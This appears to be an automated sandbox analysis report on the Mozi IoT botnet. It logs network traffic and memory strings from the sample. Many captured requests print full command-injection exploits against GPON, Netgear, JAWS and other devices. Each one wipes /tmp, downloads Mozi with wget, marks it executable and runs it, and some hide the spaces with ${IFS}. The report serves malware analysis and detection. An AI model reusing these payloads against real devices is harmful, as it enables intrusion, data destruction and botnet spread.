68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 28 Jan 2022 13:00:31 GMTContent-Type: application/json; charset=UTF-8Connection: closeX-Powered-By: PHP/7.4.27Access-Control-Allow-Origin: *Access-Control-Expose-Headers: X-Set-Token, X-Pagination-Total-Count, X-Pagination-Current-Page, X-Pagination-Page-Count, X-Pagination-Per-Page, DateX-Request-Id: 9d06b78bea2708d7e8e3bc7ac0321d13d3c8de1c6e6fb6477d83ef094784b472Set-Cookie: SERVERID=w02-8888; path=/Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 22 2c 22 63 6f 64 65 22 3a 30 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 70 72 65 76 69 6f 75 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 49 6e 76 61 6c 69 64 20 52 6f 75 74 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 55 6e 61 62 6c 65 20 74 6f 20 72 65 73 6f 6c 76 65 20 74 68 65 20 72 65 71 75 65 73 74 20 5c 22 73 65 74 75 70 2e 63 67 69 5c 22 2e 22 2c 22 63 6f 64 65 22 3a 30 7d 7d Data Ascii: {"name":"Not Found","message":"Page not found.","code":0,"status":404,"previous":{"name":"Invalid Route","message":"Unable to resolve the request \"setup.cgi\".","code":0}}
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:28 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.10Date: Fri, 28 Jan 2022 13:00:37 GMTContent-Type: text/htmlContent-Length: 154Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.10</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 295Date: Fri, 28 Jan 2022 13:00:45 GMTData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 3c 2f 63 6f 64 65 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Not Found</h1><h2>The requested URL <code>/GponForm/diag_Form</code> was not found on this server.</h2><h2></h2></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:51 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeContent-Type: text/htmlData Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Fri, 28 Jan 2022 16:03:05 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: networks.12.dr String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.12.dr String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.12.dr String found in binary or memory: http://127.0.0.1
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://HTTP/1.1
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.12.dr String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.12.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.12.dr String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.12.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.12.dr String found in binary or memory: http://www.pastebin.ca/upload.php
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.219.131.213:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 162.209.132.128:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 148.229.1.12:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 205.198.160.107:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.25.119.143:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 171.25.175.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.35.5.125:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.58.36.209:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.173.33.241:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.6.123.60:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.215.82.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.32.54.199:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.44.16.109:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.142.213.80:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 87.17.124.195:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Spam, unwanted Advertisements and Ransom Demands
barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/Mozi.m.3 (PID: 5224) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary
barindex
Yara signature match
